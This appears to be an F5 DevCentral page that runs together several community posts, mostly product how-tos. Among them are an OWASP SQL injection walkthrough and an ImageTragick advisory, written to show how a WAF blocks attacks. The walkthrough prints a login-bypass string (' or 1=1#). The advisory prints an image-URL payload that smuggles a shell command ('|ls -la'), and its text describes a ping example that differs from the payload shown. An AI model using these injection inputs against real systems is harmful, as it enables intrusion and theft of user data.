F5 Predicts: Education gets personal
The topic of education is taking centre stage today like never before. I think we can all agree that education has come a long way from the days where students and teachers were confined to a classroom with a chalkboard. Technology now underpins virtually every sector and education is no exception. The Internet is now the principal enabling mechanism by which students assemble, spread ideas and sow economic opportunities. Education data has become a hot topic in a quest to transform the manner in which students learn. According to Steven Ross, a professor at the Centre for Research and Reform in Education at Johns Hopkins University, the use of data to customise education for students will be the key driver for learning in the future[1].This technological revolution has resulted in a surge of online learning courses accessible to anyone with a smart device. A two-year assessment of the massive open online courses (MOOCs) created by HarvardX and MITxrevealed that there were 1.7 million course entries in the 68 MOOC [2].This translates to about 1 million unique participants, who on average engage with 1.7 courses each. This equity of education is undoubtedly providing vast opportunities for students around the globe and improving their access to education. With more than half a million apps to choose from on different platforms such as the iOS and Android, both teachers and students can obtain digital resources on any subject. As education progresses in the digital era, here are some considerations for educational institutions to consider: Scale and security The emergence of a smogasborad of MOOC providers, such as Coursera and edX, have challenged the traditional, geographical and technological boundaries of education today. Digital learning will continue to grow driving the demand for seamless and user friendly learning environments. In addition, technological advancements in education offers new opportunities for government and enterprises. It will be most effective if provided these organisations have the ability to rapidly scale and adapt to an all new digital world – having information services easily available, accessible and secured. Many educational institutions have just as many users as those in large multinational corporations and are faced with the issue of scale when delivering applications. The aim now is no longer about how to get fast connection for students, but how quickly content can be provisioned and served and how seamless the user experience can be. No longer can traditional methods provide our customers with the horizontal scaling needed. They require an intelligent and flexible framework to deploy and manage applications and resources. Hence, having an application-centric infrastructure in place to accelerate the roll-out of curriculum to its user base, is critical in addition to securing user access and traffic in the overall environment. Ensuring connectivity We live in a Gen-Y world that demands a high level of convenience and speed from practically everyone and anything. This demand for convenience has brought about reform and revolutionised the way education is delivered to students. Furthermore, the Internet of things (IoT), has introduced a whole new raft of ways in which teachers can educate their students. Whether teaching and learning is via connected devices such as a Smart Board or iPad, seamless access to data and content have never been more pertinent than now. With the increasing reliance on Internet bandwidth, textbooks are no longer the primary means of educating, given that students are becoming more web oriented. The shift helps educational institutes to better personalise the curriculum based on data garnered from students and their work. Duty of care As the cloud continues to test and transform the realms of education around the world, educational institutions are opting for a centralised services model, where they can easily select the services they want delivered to students to enhance their learning experience. Hence, educational institutions have a duty of care around the type of content accessed and how it is obtained by students. They can enforce acceptable use policies by only delivering content that is useful to the curriculum, with strong user identification and access policies in place. By securing the app, malware and viruses can be mitigated from the institute’s environment. From an outbound perspective, educators can be assured that students are only getting the content they are meant to get access to. F5 has the answer BIG-IP LTM acts as the bedrock for educational organisations to provision, optimise and deliver its services. It provides the ability to publish applications out to the Internet in a quickly and timely manner within a controlled and secured environment. F5 crucially provides both the performance and the horizontal scaling required to meet the highest levels of throughput. At the same time, BIG-IP APM provides schools with the ability to leverage virtual desktop infrastructure (VDI) applications downstream, scale up and down and not have to install costly VDI gateways on site, whilst centralising the security decisions that come with it. As part of this, custom iApps can be developed to rapidly and consistently deliver, as well as reconfigure the applications that are published out to the Internet in a secure, seamless and manageable way. BIG-IP Application Security Manager (ASM) provides an application layer security to protect vital educational assets, as well as the applications and content being continuously published. ASM allows educational institutes to tailor security profiles that fit like a glove to wrap seamlessly around every application. It also gives a level of assurance that all applications are delivered in a secure manner. Education tomorrow It is hard not to feel the profound impact that technology has on education. Technology in the digital era has created a new level of personalised learning. The time is ripe for the digitisation of education, but the integrity of the process demands the presence of technology being at the forefront, so as to ensure the security, scalability and delivery of content and data. The equity of education that technology offers, helps with addressing factors such as access to education, language, affordability, distance, and equality. Furthermore, it eliminates geographical boundaries by enabling the mass delivery of quality education with the right policies in place. [1] http://www.wsj.com/articles/SB10001424052702304756104579451241225610478 [2] http://papers.ssrn.com/sol3/papers.cfm?abstract_id=2586847863Views0likes3CommentsNessus 6 XSLT Conversion for ASM Generic Scanner Import
It is important to understand while reading this, I am not an ASM SME... The goal was to create a simple conversion of the Nessus Vulnerability Scan reports to import into ASM. The first step was figuring out what the scan results needed to look like. So I exported the generic schema from ASM (13.0), which translates to: <?xml version="1.0" ?> <scanner_vulnerabilities> <vulnerability> <attack_type></attack_type> <name></name> <url></url> <parameter></parameter> <cookie></cookie> <threat></threat> <score></score> <severity></severity> <status></status> <opened></opened> </vulnerability> </scanner_vulnerabilities> That seems pretty simple, but thats a lot of attack types to map to some logic, so for now I will leave it generic. The next step is to get a vulnerability scan of a vulnerable web application. I wont go into how to use Nessus here, but one of the export options is a ".nessus" which is just an XML file. There is actually too much data in this file, but you can leave it as is. If you want to read it you can remove the <Policy> sections because all we want are the Reports. For this test, I ran a scan againstgoogle-gruyere.appspot.com, which is an unsecured app available to the internet. Dont do this from AWS or someone will come looking for you, ask me how I know... Example of results: <?xml version="1.0" ?> <NessusClientData_v2> <Report name="ASMv2" xmlns:cm="http://www.nessus.org/cm"> <ReportHost name="google-gruyere.appspot.com"> <HostProperties> <tag name="HOST_END">Tue Aug 29 14:08:04 2017</tag> <tag name="LastUnauthenticatedResults">1504015684</tag> <tag name="Credentialed_Scan">false</tag> <tag name="policy-used">Advanced Scan</tag> <tag name="patch-summary-total-cves">16</tag> <tag name="cpe">cpe:/o:linux:linux_kernel</tag> <tag name="os">linux</tag> <tag name="cpe-2">cpe:/o:linux:linux_kernel:2.6</tag> <tag name="cpe-1">cpe:/o:linux:linux_kernel:2.4</tag> <tag name="cpe-0">cpe:/o:linux:linux_kernel:2.2</tag> <tag name="system-type">general-purpose</tag> <tag name="operating-system">Linux Kernel 2.2 Linux Kernel 2.4 Linux Kernel 2.6</tag> <tag name="traceroute-hop-0">?</tag> <tag name="host-ip">172.217.3.212</tag> <tag name="host-fqdn">google-gruyere.appspot.com</tag> <tag name="HOST_START">Tue Aug 29 13:21:20 2017</tag> </HostProperties> <ReportItem pluginFamily="CGI abuses" pluginID="39470" pluginName="CGI Generic Tests Timeout" port="443" protocol="tcp" severity="0" svc_name="www"> <description>Some generic CGI tests ran out of time during the scan. The results may be incomplete.</description> <fname>torture_cgi_timeout.nasl</fname> <plugin_modification_date>2016/09/21</plugin_modification_date> <plugin_name>CGI Generic Tests Timeout</plugin_name> <plugin_publication_date>2009/06/19</plugin_publication_date> <plugin_type>summary</plugin_type> <risk_factor>None</risk_factor> <script_version>$Revision: 1.13 $</script_version> <solution>Consider increasing the 'maximum run time (minutes)' preference for the 'Web Applications Settings' in order to prevent the CGI scanning from timing out. Less ambitious options could also be used, such as : - Test more that one parameter at a time per form : 'Test all combinations of parameters' is much slower than 'Test random pairs of parameters' or 'Test all pairs of parameters (slow)'. - 'Stop after one flaw is found per web server (fastest)' under 'Do not stop after the first flaw is found per web page' is quicker than 'Look for all flaws (slowest)'. - In the Settings/Advanced menu, try reducing the value for 'Max number of concurrent TCP sessions per host' or 'Max simultaneous checks per host'.</solution> <synopsis>Some generic CGI attacks ran out of time.</synopsis> <plugin_output>The following tests timed out without finding any flaw : - XSS (on HTTP headers) - blind SQL injection - local file inclusion - blind SQL injection (time based) - unseen parameters - directory traversal (extended test) - directory traversal - arbitrary command execution - SQL injection (on HTTP headers) - SQL injection </plugin_output> </ReportItem> So far so good... Some of this will be a mess, but we can take a stab at it... So lets mash it all together! So how to tie it all together? There are some tools to help, online, I used to have on for Windows but I dont remember what its called, but I have a MAC now, so... xsltproc ASM_Nessus.xsl Nessus_Scan.xml > ASM_Import.xml FYI, for Windows users... https://www.microsoft.com/en-us/download/details.aspx?id=21714 Which gives me a pretty file to import to ASM. Its too big to post as text, but it looks like this: Alright, so the final test, lets import to ASM... Nice! It could use some work around Attack Type mapping and Parameter mapping, but it looks like it works. Well, thats as far as I got, I hope it helps someone. Now take it and run! XSLT can be found on github: https://github.com/Mikej81/NessusGenericASMSchema2.2KViews1like21CommentsDevCentral Top 5: Sep 8, 2014
But soft! What light through yonder window breaks? It is the east, and this week's edition of the DevCentral Top 5 is the sun. Yep, you guessed it. The top 5 is back...but unlike Shakespeare's Romeo and Juliet, this is no tragedy. Rather, it's a celebration of the most awesome articles you'll read anywhere on the Internet. Our DevCentral authors have been writing with freakish speed and determination, and they have turned out quality articles that are simply second to none. Choosing only five articles was a tough task given all the great content out there, but here's my take on the top articles since our last posting. F5 SOC Malware Summary Report: Neverquest I literally could have chosen five Lori MacVittie articles for this "top 5" but I resisted the urge and only chose one. In this article, Lori explains the details of a Trojan known as "Neverquest" that has been active since July 2013. Most of us get that warm, fuzzy, secure feeling when using 2-factor authentication because, you know, it's got 2 factors! Maybe automated malware has a shot at cracking one factor, but two? No way. Well, apparently Neverquest has found a way to automate the demise of our beloved 2FA. Lori does a magnificent job of explaining how Neverquest works, and then she discusses the amazing work that was completed by our F5 Security Operations Center in their analysis of this malware (in case you didn't know, F5 has a Security Operations Center that analyzes malware like this and provides amazing reports that are free for anyone to read). Lori provides links to the downloads of the executive summary as well as the full technical analysis of Neverquest. This one is not optional...if you care about anything at all, you gotta read this one. Leveraging BIG-IP APM for seamless client NTLM Authentication Michael Koyfman reminds us why we love the BIG-IP APM...transparent seamless authentication for users. In this article, Michael specifically discusses how to configure the APM to perform client NTLM authentication and use it in the context of sending a SAML assertion to the Office 365 service. This is a step-by-step masterpiece that shows you exactly what to do at every turn. In the end, you point your browser to the FQDN of the APM virtual server and you will be silently authenticated (let's be honest...silent authentication is a bucket-list item for each and every one of us). Michael also reminds us of the SSO options at the end of his article. Webshells Nir Zigler introduces us to Webshells (web scripts that act as a control panel for the server running them), and talks about some of the common uses for these scripts. But you know the story...scripts that were created for good can also be used for evil. After Nir explains all the valid uses for legitimate webshells, he takes us to a place where mere mortals dare not tread...through a webshell attack. He gives us an overview of how a webshell attack works, and then he explains some of the specific tools that are used for these nefarious actions. After walking through the power and functionality of an open source webshell called b374k, Nir shows how this tool can be used to attack an unsuspecting user. But have no fear! Nir finishes up the article by discussing the power of the BIG-IP ASM and how it will detect and prevent webshell attacks. Continuing the DDoS Arms Race How long have DDoS attacks been around, and why are they still news today? Because they are consistently one of the top attack vectors that companies face today. Shauntine'z discusses the DDoS arms race and provides some poignant statistics that remind us of the very real and credible DDoS threat. But the article doesn't stop there...it goes on to provide some excellent tips on what to do to strengthen your DDoS defense posture (it even has a well-placed picture of Professor John Frink...you gotta check this one out). Last, Shauntine'z reveals new features that are loaded in the latest release of the BIG-IP...version 11.6. The AFM and ASM have some new and exciting capabilities that are "must haves" for any company that is serious about securing their applications and critical business functions. (Editors note: the LineRate product has been discontinued for several years. 09/2023) Why ECC and PFS Matter: SSL offloading with LineRate We all know that sensitive data traverses our networks every day. We also know it's critically important to secure this information. We also know that SSL/TLS is the primary method used to secure said information. Andrew Ragone discusses SSL offloading and tells us why Elliptical Curve Cryptography (ECC) and Perfect Forward Secrecy (PFS) are great candidates for securing your information. He highlights the advantages of the software based LineRate solution, and gives great examples of why LineRate is the clear-cut winner over any existing software-based or hardware-based SSL/TLS offload solutions. Andrew also published another series of articles related to this very topic, and in these articles he walks you through the exact steps needed to configure SSL certificates and offload SSL on LineRate. On that subject...if you haven't had a chance to check out LineRate and learn all about the awesomeness that it is, do yourself a favor and visit199Views0likes0CommentsHow I did it - "Visualizing Data with F5 TS and Splunk"
The new Splunk Add-on for F5 BIG-IPincludes several objects, (modular inputs, CIM-knowledge, etc.) that work to “normalize” incoming BIG-IP data for use with other Splunk apps, such as Splunk Enterprise Security and the Splunk App for PCI Compliance. The add-on includes a mechanism for pulling network traffic data, system logs, system settings, performance metrics, and traffic statistics from the F5 BIG-IP platform using F5’s iControl API, (see below). But what I'm really excited about is that the add-on now integrates with F5 Telemetry Streaming, (TS).With TS I am easily able to declaratively aggregate, normalize, and push BIG-IP statistics and events, (JSON-formatted) to a variety of third-party analytics vendors. For the remainder of this article, we’ll take a look at how I integrate F5 TS with Splunk Enterprise.I’ll be working with an existing BIG-IP deployment as well as a newly deployed Splunk Enterprise instance.As an added bonus, (and since it’s part of the article’s title) I’ll import a couple custom dashboards, (see below) to visualize our newly ingested telemetry data. Oh! As an "Extra" added bonus, here is a link to a video walk through of this solution. Installing the Splunk Add-on for F5 BIG-IP and Splunk CIM Installing the Splunk F5 add-on is very simple.Additionally, to make use of the add-on I’ll need to install Splunk’s Common Information Model, (CIM). 1.From the top Splunk the search page, I select ‘Apps’ → ‘Find More Apps’. 2.I browse for “CIM” and select the Splunk Common Information Model add-on. 3.I accept the license agreement, provide my Splunk account login credentials and select ‘Login and Install’. 4.I’ll repeat steps 2-3 to install the Splunk Add-on for F5 BIG-IP. Setup Splunk HTTP Event Collector To receive incoming telemetry data into my Splunk Enterprise environment over HTTP/HTTPs I will need to create an HTTP Event Collector. 1.From the UI I select ‘Settings’ → ‘Data Inputs’.I select ‘HTTP Event Collector’ from the input list. 2.Prior to creating a new event collector token, I must first enable token access for my Splunk environment. On the ‘HTTP Event Collector’ page, I select ‘Global Settings’.I set‘All Tokens’ to enabled, default index, incoming port and ensure SSL is enabled.I click ‘Save’ to exit. 3.I select ‘New Token’ and provide a name for the new collector and select ‘Next’. 4.On the ‘Input Settings’ tab I’ll select my allowed index(es) and select ‘Review’ then ‘Submit’. 5.Once the token is created, I will need to copy the token for use with my F5 TS configuration. Configure Telemetry Streaming With my Splunk environment ready to receive telemetry data, I now turn my attention to configuring the BIG-IP for telemetry streaming.Fortunately, F5’s Automation Toolchain configuring the BIG-IP is quite simple. 1.I’ll use Postman to POST an AS3 declaration to configure telemetry resources, (telemetry listener, log publisher, logging profiles, etc.). The above AS3 declaration, (available here) deploys the required BIG-IP objects for pushing event data to a third-party vendor. Notably, it creates four (4) logging profiles I’ll attach to my application’s virtual server. 2.Still using Postman, I POST my TS declaration, (sample).I will need to provide my Splunk HTTP Collector endpoint address/port as well as the token generated previously. Associate Logging Profiles to Virtual Server The final step to configuring the BIG-IP for telemetry streaming is associating the logging profiles I just created with my existing virtual server. In addition to system telemetry, these logging profiles, when assigned to a virtual,will send LTM, AVR, and ASM telemetry. 1.From the BIG-IP management UI, I select ‘Local Traffic’ → ‘Virtual Servers’ → <virtual>. 2.Under ‘Configuration’ I select ‘Advanced’, scroll down and select the HTTP, TCP, and request logging profiles previously created.I select ‘Update’ at the bottom of the page to save 3.From the top of the virtual server page, I select ‘Security’ → ‘Policies’.From the policy settings page, I can see that there is an existing WAF policy associated with my application.To enable ASM logging, I select the previously created ASM logging profile from the available logging profiles and select ‘Update’ to save my changes. With the configuration process complete, I should now start seeing event data in my Splunk Environment. Import Dashboards “Ok, so I have event data streaming into my Splunk environment; now what?” Since I have installed the Splunk F5 add-on, I can integrate my “normalized” data with other data sources to populate various Splunk applications like Splunk Enterprise Security and Splunk App for PCI Compliance.Likewise, I can use dashboards to visualizemy telemetry data as well as monitor BIG-IP resources/processes.To finish up, I’ll use the following steps to create custom dashboards visualizing BIG-IP metrics and Advanced WAF, (formerly ASM) attack information. 1.From the Splunk Search page, I navigate to the Dashboards page by selecting ‘Dashboards’. 2.Select ‘Create New Dashboard’ from the Dashboards page. 3.Provide a name for the new dashboard and select ‘Create Dashboard’.The dashboard name, (ID will remain unchanged) will be updated in the next step where I replace the newly created dashboard’s XML source with one of the community-supported dashboard XML files here. 4.On the ‘Edit Dashboard' screen I select ‘Source’ to edit the dashboard XML.I replace the existing XML data with the contents of the ‘advWafInsights.xml’ file.Select ‘Save’ to install the new dashboard. 5.I’ll repeat steps 1-4 using ‘bigipSystemMetrics.xml’ to install the BIG-IP metrics dashboard, Additional Links ·F5 Telemetry Streaming ·Splunk Add-on for F5 BIG-IP ·Splunk Common Information Model ·F5 Automation Toolchain9.4KViews5likes24CommentsConfiguring Unified Bot Defense with BIG-IQ Centralized Management
While estimates vary, it is believed that more than half of the Internet traffic is being generated by bots, out of which unwanted or malicious ones (like spam or malware bots) account for more than half of the traffic, the remaining traffic being generated by “good” bots (like crawlers or feed fetcher bots). It is therefore important to differentiate between different classes of bots and treat them according to site-specific security policies. The Unified Bot Defense profiles, first released in TMOS version 14.1, package bot protection features like Bot Signatures and Proactive Bot Defense previously found in L7 DoS profiles and Web Scraping protection found in ASM policies. Configuring Unified Bot Defense profiles through BIG-IQ ensures configuration consistency over the centralized managed BIG-IP estate and enhanced reporting capabilities. This article will guide you through the configuration of Unified Bot Defense profiles using BIG-IQ CM User Interface. It is assumed that the BIG-IP device where the Bot Defense profile will be deployed is currently managed by the BIG-IQ cluster, at least one BIG-IQ Logging Node / Data Collection Device is available and the Virtual Server to be protected is already configured (in the example below, VS_12BOX) - the configuration of these elements will not be part of this article. This article covers: configuring the Shared Security / Application Security Event Logging Profile configuring the Bot Defense profile monitoring the Bot Defense profiles Configuration of the Security Log Profile 1. Go to Configuration->LOCAL TRAFFIC->Pools, click Create and fill in the settings: -Name: Pool_DCD -Device: select the BIG-IP device -Health monitors: gateway_icmp -New member: - Select "New Node" - Address: Type the Log Node / DCD IP address - Port: 8514 (this is the port that Web Application Security Service is listening on the Logging Node / DCD) Note: Ensure that the Logging Node / Data Collection Device has the Web Application Security Service activated and the managed BIG-IP has LTM, SSM and ASM services Discovered/Imported. 2. Go to Configuration->LOCAL TRAFFIC->Logs ->Log Destination, click Create and fill in the settings: - Name: Log_dst_HSL_DCD - Type: Remote High-Speed - Device: select the BIG-IP device - Pool: select /Common/Pool_DCD 3. Go to Configuration->LOCAL TRAFFIC->Logs ->Log Destination, click Create and fill in the settings: - Name: Log_dst_Splunk_DCD - Type: SPLUNK - Forward to: select /Common/Log_dst_HSL_DCD 4. Go to Configuration->LOCAL TRAFFIC->Logs ->Log Publishers, click Create and fill in the settings: - Name: Log_pub_DCD - Log destinations: select /Common/Log_dst_Splunk_DCD 5. Go to Configuration->LOCAL TRAFFIC->Pinning Policies and select the BIG-IP device - Filter the available Local Traffic Manager (LTM) objects by selecting Log Publishers from the dropdown menu - Check Log_pub_DCD and click Add Selected button 6. Go to Configuration->SECURITY->Shared Security ->Logging Profiles, click Create and fill in the settings: -Name: Log_bot_protect_demo -Bot Defense: -Status: Enabled -Local Publisher: Enabled -Remote Publisher: /Common/Log_pub_DCD Attach the Log_bot_protect_demo log profile to the protected Virtual Server (in this example, VS_12BOX VS) 1. Go to Configuration->SECURITY->Shared Security->Virtual Servers and click on VS_12BOX VS 2. Select the Log_bot_protect_demo log profile for Logging profiles Deploy the configuration to the BIG-IP 1.Go to Deployment->EVALUATE & DEPLOY-> Local Traffic & Network, create a new Deployment. Once the evaluation has finished, click on Deploy. 2. Go to Deployment->EVALUATE & DEPLOY-> Shared Security, create a new Deployment. Once the evaluation has finished, click on Deploy. Configuration of the Bot Defense Profile Go to Configuration->SECURITY->Shared Security ->Bot Defense-> Bot Profiles, click Create and fill in the settings: -Name: bot_defense_demo -Enforcement Mode: Blocking -Profile Template: Strict -Browser Verification: -Browser Access: Allowed -Browser Verification: Verify After Access (Blocking) Note: As per K42323285: Overview of the unified Bot Defense profile the available options for the configuration elements used in this examples are: Enforcement Mode: Select one of the following modes, depending on the readiness of your application environment and requirements: Transparent—The system logs traffic mitigation and verification actions, according to your logging profile settings, but does not provide the following: JavaScript-based verification. Device ID collection. CAPTCHA challenge. Blocking—The system performs traffic mitigation and verification, and logsthem according to yourlogging profile settings. Profile Template: The template you select determines the default values for mitigation and verification settings. However, you can customize these settings to meet your application security requirements. After the system saves the profile, you can't change this setting. The following list contains descriptions of the available templates: Relaxed—Performs basic verification of browsers and blocks malicious bots based on bot signatures. Balanced—This is the default selection. Performs advanced verification of browsers,including: CAPTCHA challenges for suspicious browsers. Anomaly detection algorithms and bot signatures todetectand blockmalicious bots. Limitingthe total request rate for unknown bots. Strict—This is the strictest policy; it has settings that: Only allowbrowsers access if they pass proactive verification. Blockall bots except trusted ones. Browser Verification: Specifies what and when the system sends challenges. None—The system does not perform JavaScript and header-based verification. However, some anomaly detection (such as Session Opening) still occurs. Challenge-Free Verification—The default value when Profile Template is set to Relaxed. The system performs header-based verification but does not perform JavaScript verification. Verify Before Access—The default value when Profile Template is set to Strict. The system sends a white page with JavaScript to challenge the client. If the client fails the challenge, the system performs the configured mitigation action and reports the anomaly. If the client passes the challenge, the system forwards the request to the server. Verify After Access (Blocking)—The default value when Profile Template is set to Balanced. The system injects a JavaScript challenge in the server response prior to sending the response to the client. If the client fails the challenge, the systemperforms the configured mitigation action and reports the anomaly. If the client passes the challenge, the system forwards the request to the server. Verify After Access (Detection Only)—The system injects JavaScript challenge in the server response prior to sending the response to the client. If the client fails the challenge, the system only reports the anomaly but does not perform any mitigation action. If the client passes the challenge, the system forwards the request to the server. Device ID Mode: A unique identifier that BIG-IP ASM creates by sending JavaScript to get information about the client device. The default value for this setting is determined by your selection inProfile Template (under General Settings). F5 recommends you use the default values set by the Profile Template you selected unless you have specific application requirements. None—The default value when Profile Template is set to Relaxed. The system does not send JavaScript to collect the device ID. Generate After Access—The default value when Profile Template is set to Balanced. The system injects the JavaScript in the server response before forwarding to the client. This is less intrusive and has less of a latency impact. Generate Before Access—The default value when Profile Template is set to Strict. The system sends the JavaScript challenge to the client before forwarding the client request to the server. This guarantees that every request that reaches the server has a device ID. This has more of a latency impact compared to the previous option. The system blocks bots that attempt to present themselves asbrowsers but are unable to execute the JavaScript challenge. Attach the bot_defense_demo bot protect profile to the VS_12BOX VS 1. Go to Configuration->SECURITY->Shared Security->Virtual Servers and click on VS_12BOX VS 2. Select the bot_defense_demo profile for Bot Defense profile Deploy the Bot Defense profile to the BIG-IP Go to Deployment->EVALUATE & DEPLOY-> Shared Security, create a new Deployment. Once the evaluation has finished, click on Deploy Monitoring Bot Defense Profiles To monitor Bot Protection operation, check the Monitoring->DASHBOARDS->Bot Traffic Dashboard and Monitoring->EVENTS->Bot->Bot requests logs743Views2likes1CommentOWASP Mitigation Strategies Part 1: Injection Attacks
The OWASP organization lists “injection” attacks as the number one security flaw on the Internet today. In fact, injection attacks have made the OWASP top ten list for the past 13years and have been listed as the number one attack for the past 9years. Needless to say, these attacks are serious business and should be guarded against very carefully. Every web application environment allows the execution of external commands such as system calls, shell commands, and SQL requests. What’s more, almost all external calls can be attacked if the web application is not properly coded. In the general sense of the word, an injection attack is one whereby malicious code is “injected” into one of these external calls. These attacks are typically used against SQL, LDAP, Xpath, or NoSQL queries; OS commands; XML parsers, SMTP Headers, program arguments, etc. When a web application passes information from an HTTP request to an external system, it must be carefully scrubbed. Otherwise, the attacker can inject malicious commands into the request and the web application will blindly pass these on to the external system for execution. One of the most common types of injection attacks in a SQL injection. Many web applications utilize a backend database to store critical information like usernames, passwords, credit card numbers, personal information (address/phone number), etc. When you login to a website, you present your authentication credentials (i.e. username/password), and something on that backend has to validate that you are the correct user. There’s a database back there somewhere holding all that information. In effect, what has happened is that the website you are logging into sent an external command to a backend database and used the credentials you provided in the HTTP request to validate you against the stored database information. Along the way somewhere, some malevolent peeps had some crazy thoughts that went something like this: “hey, if my HTTP request is going to ultimately populate a SQL database command, maybe I could supply some crazy info in that HTTP request so that the SQL command ends up doing some really wild things to that backend database!!” That’s the idea behind the SQL injection attack. SQL commands are used to manipulate database information. You can add, delete, edit, display, etc any information in the database. Like any other system commands, these can be very helpful or very dangerous…it just depends on how they are used. Of course, these commands need to be locked down so that only trusted administrators can use them when running queries on the database. But imagine a web application that wasn’t built correctly and it allows SQL commands to be passed from the HTTP request to the backend database with no error checking at all. That would be a ripe web application for an injection attack! SQL Injection Attack The screenshot below shows a web application for an online auction site called “Hack-it-yourself auction”. This is a fictitious site that was purposely built with bad coding techniques and tons of vulnerabilities. It provides a great testing venue for things like injection attacks. It also showcases the power of a Web Application Firewall (WAF) and the protection it can provide even when your web application is totally vulnerable like this one. Notice in the screenshot that a user can login to the auction site via the “username” and “password” fields on the right side of the page. When a user submits login information on the website, the HTTP request takes the values from the “username” and “password” fields and uses them to formulate a SQL command to validate the user against the backend database that stores all the user information (name, address, credit card number, etc). The SQL command is designed to look something like this: SELECT id FROM users WHERE username = “username”and password = “password” This SQL command grabs the values for “username” and “password” that the user typed into each of those fields. If the username and password are correct, then the user is validated and the web application will allow the user’s information to be displayed. A SQL injection takes advantage of the fact that the HTTP request values are used to build the SQL command. An attacker could replace the “username” info with an interesting string of characters that don’t look very normal to the casual observer but are still understood by the backend database. Check out the screenshot below to see the unique SQL injection username. In this example, the username is ‘ or 1=1# and that will result in the SQL statement looking something like this: SELECT id FROM users WHERE username = ‘’ or 1=1#and password = '".md5($MD5_PREFIX.$password)."' Essentially, this statement is asking the database to select all records in the users table. It takes advantage of the fact that the web application is not validating user inputs and it uses the "or" expression on the username and then states a fact (in this case, 1=1) so that the database will accept it as a true statement. It also uses some creative MD5 hash techniques to access the password. Notice the username in the screenshot below: Apparently this SQL injection worked because now I am logged in as user ‘ or 1=1#. Not your typical, everyday username! So, the authentication was allowed to happen and the database is now ready to serve up any and all records that are located in the users table. I wonder what kind of goodness we can find there? Notice the “Your control panel” link on the page…that link takes you to the information stored for each user in the database. The database is ready to serve up ALL the records in the users table, so let’s click on that “Control Panel” link and see what kind of goodies we can find. Check out the screenshot below and notice in the address bar a familiar-looking username at the end of the URL: Clearly we have some serious issues here. At this point, the attacker has all the names, credit card numbers, emails, phone numbers, and addresses of every single user of this auction site. The attacker could simply copy all this information and use it later or he could manipulate it using other SQL commands or he could delete it all…the possibilities are seemingly endless. Think about some of the recent data breaches you’ve read about (or experienced) that have disclosed sensitive information…some of them happened because of a situation very similar to what I’ve just shown above. The correct answer for this problem is to fix the code that was used to develop this web application. Obviously, this specific code doesn’t check for valid usernames…it will pass along anything you put in that field. OWASP has a list of proactive controls that are great techniques to help prevent exploitation of one or more of the OWASP top ten vulnerabilities. For injection attacks specifically, code developers should do things like parameterize queries, encode data, and validate inputs. Ideally, code developers will write phenomenal code and you won’t ever have to worry about these vulnerabilities. And, in recent years, developers have done a great job of using secure coding practices to do just that. However, not all developers are perfect, and some of the code we use today is very old and hard to change…it’s also full of security vulnerabilities that allow for things like SQL injections. Web Application Firewall Mitigation The BIG-IP Application Security Manager (ASM) is a Web Application Firewall (WAF) that protects your web applications from attacks like the ones listed in the OWASP top ten. While it’s true that code should always be developed in a secure manner, those of us who live in the real world understand that we can’t rely on the hope of secure coding practices to protect our critical information all the time. That’s why you need a WAF. In the case of the very vulnerable “Hack-it-yourself auction” site, a WAF will protect the web application when it cannot protect itself. In the case of a SQL injection, a typical network firewall would have never blocked that attack because it was, in fact, a valid HTTP request on an open port (80, in this case). However, a WAF will inspect the HTTP request, notice that something isn’t quite right, and block it before it ever has a chance to do any damage to your backend database. I created a security policy using the BIG-IP ASM and then turned it on to protect the auction site. The ASM now sits between the user and the web application, so every HTTP request will now flow through the ASM before it heads over to the website. The ASM will inspect each request and either let it through or block it based on the configuration of the security policy. I won’t go into the details of how to build a policy in this article, but you can read more about how to build a policy here. After the security policy was created and activated, I tried the same SQL injection again. This time, instead of getting access to all those credit card numbers, I got a screen that looks like this (you can manipulate the screen to say whatever you want, by the way): Clearly the ASM is doing its job. Another cool thing about the ASM is that you can review the HTTP request logs to see exactly what an attacker is attempting to do when attacking your web application. The screenshot below shows some of the details of the SQL injection attempt. Notice the “Detected Keyword” portion of the screen…see anything familiar? Stay tuned for more exciting details on how the ASM can protect your web applications against other OWASP top ten (and more) vulnerabilities!2KViews0likes0CommentsImageTragick - ImageMagick Remote Code Execution Vulnerability
Abstract Recently, a number of vulnerabilities have been found in a very popular library, which is used to process image files. The vulnerabilities allow the attacker to execute code, move, read or delete remote files and issue outgoing requests from a web server. In certain scenarios, the vulnerability even can be exploited without authentication, making this a very powerful vulnerability and dangerous to unpatched web servers. This article will explain how those vulnerabilities can be mitigated using F5s Big-IP with ASM provisioned. ImageMagic ImageMagick is very popular piece of software, many programming languages have interface for ImageMagick allowing the programmatic access to image processing and editing. Itruns on Linux, Windows, Mac, iOS and many more: Quoting the ImageMagick.org The functionality of ImageMagick® is typically utilized from thecommand-lineor you can use the features from programs written in your favorite language. Choose from these interfaces:G2F(Ada),MagickCore(C),MagickWand(C),ChMagick(Ch),ImageMagickObject(COM+),Magick++(C++),JMagick(Java),L-Magick(Lisp),Lua(LuaJIT),NMagick(Neko/haXe),Magick.NET(.NET),PascalMagick(Pascal),PerlMagick(Perl),MagickWand for PHP(PHP),IMagick(PHP),PythonMagick(Python),RMagick(Ruby), orTclMagick(Tcl/TK). With a language interface, use ImageMagick to modify or create images dynamically and automagically . MVG format MVG stands forMagickVectorGraphics, and it is a modularized language for describing two-dimensional vector graphics using the ImageMagick engine. It can look like this: push graphic-context viewbox 0 0 400 400 image over 0,0 0,0 'label:@/home/files/nice_text' pop graphic-context In this example, the ImageMagick engine reads the text from the 'nice_text' file and draws a label with its contents over the picture. Vulnerability - ImageTragick The group of vulnerabilities was named ImageTragick because they exploit the ImageMagick package. The package contains several “coders” supporting instructions and commands for image manipulation. For instance, using the “label” instruction one can add a free text from a file to an image. Several instructions were found to be vulnerable to different types of attack. More detailed information on each vulnerability can be found in the researchers’ website: https://imagetragick.com/ We could distinguish those findings as three types of vulnerabilities: Shell Command Execution Application Abuse of Functionality Server Side Request Forgery Shell Command Execution CVE-2016-3714 By abusing this type of vulnerability, the attacker can cause the ImageMagick library to pass commands to the operation system shell potentially ending up in complete system compromise. Considering ImageMagick’s availability for all the popular operating systems and programming languages makes this vulnerability a very dangerous one. Attacker can create a file in ImageMagick MVG and SVG format and upload it to a webserver, which will process this file. Successfully performing this operation will cause ImageMagick to execute the command from the crafted file. Example: fill 'url(https://example.com/image.jpg";|ls -la")' The vulnerable code takes the URL and without proper validation concatenates it to the “wget” system command to fetch the image. Attacker is able to provide a URL ending with a double quote character and concatenate additional arbitrary system commands, such as a “ping” command (“ping www.f5.com”) in the above example. If the server is vulnerable, it will contact www.f5.com. Attackers can replace the “ping” command by something less naive, such as, changing the password of the 'root' account or installing a malware or a backdoor to gain control over the server. ImageTragick Application Abuse It was found that some coders include functionality that could be misused in order to perform the following operations on the server: 